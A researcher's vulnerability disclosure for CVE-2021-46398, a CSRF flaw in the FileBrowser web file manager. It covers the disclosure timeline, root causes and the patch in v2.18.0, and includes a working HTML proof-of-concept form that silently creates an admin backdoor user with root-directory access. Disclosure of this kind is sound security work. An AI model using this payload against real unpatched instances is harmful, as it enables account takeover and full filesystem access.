CVE-2021-46398: Critical CSRF in FileBrowser

Introduction

This is Febin , a security professional.

I used to pick random opensource software for my research, recently I took some web based file management software as my research targets. There I found some popular web-based file managers, one of them was a software named “FileBrowser” . While poking around I was able to find an awesome vulnerability in the application that leads to account takeover, complete access to filesystem and command execution. This article is going to be on that vulnerability.

Disclosure Timeline:

October 16, 2021 - Contacted the vendor and reported the vulnerability

October 19, 2021 - Vendor replies back

October 30, 2021 - Vulnerability has been patched in version v2.18.0

Vendor/Software - Product Details

Filebrowser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit your files. It allows the creation of multiple users and each user can have its own directory. It can be used as a standalone app or as a middleware.

Link: https://filebrowser.org/

Github Repo: https://github.com/filebrowser/filebrowser

The Vulnerability:

FileBrowser is a popular file manager / file managing interface developed in Go language. Admin can create multiple users, even another Admin privileged user and give access to any directory he wants, the user creation is handled by an endpoint "/api/users".

The endpoint accepts input in JSON format to create users, but fails to verify that the “Content-Type” HTTP header, the Content-Type header’s value should be “application/json” but it accepts “text/plain” and that’s where the vulnerability arise. Also the “Origin” is not validated and there’s no anti-CSRF tokens implemented either.

Hence an attacker can easily exploit this vulnerability to create a backdoor user with admin privileges and access to the home directory or whichever directory the attacker wants to access, just by sending a malicious webpage URL to the legitimate admin and access the whole filesystem of the victim.

Affected Versions: _v2.17.2 and below versions were affected. =< 2.17.2
_

Proof Of Concept:

The below HTML code will exploit the Flaw

<html>

<body style="text-align:center;">
<h1> FileBrowser CSRF PoC by Febin </h1>
<form action="http://ubuntu.local:8080/api/users" method="POST" enctype="text/plain">

  <input type="hidden" name='{"what":"user","which":\[\],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":\[\],"hideDotfiles":false,"username":"pwned","password":"","rules":\[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}\],"lockPassword":false,"id":0,"password":"pwned"}}' value='test'>  
  <input type="submit" value="CLICK ME!">  
</form>

  </body>

</html>

1. I started a filebrowser instance inside my ubuntu VM

2. I hosted the exploit on a simple HTTP server inside my host OS.

3. When I click the “CLICK ME!” button, it sends a POST request in the background towards the filebrowser URL and that creates a backdoor user named “pwned” with access to the “/root/” directory.

Logged in as pwned user.

Root Cause:

1. X-Auth header is not validated properly

2. No Anti-CSRF token

3. Using content-type “text/plain” makes the attack possible

4. Origin header is not validated

PATCH

Update to the latest version as the flaw has been patched from v2.18.0

Commit: https://github.com/filebrowser/filebrowser/commit/74b7cd8e81840537a8206317344f118093153e8d

Thank you.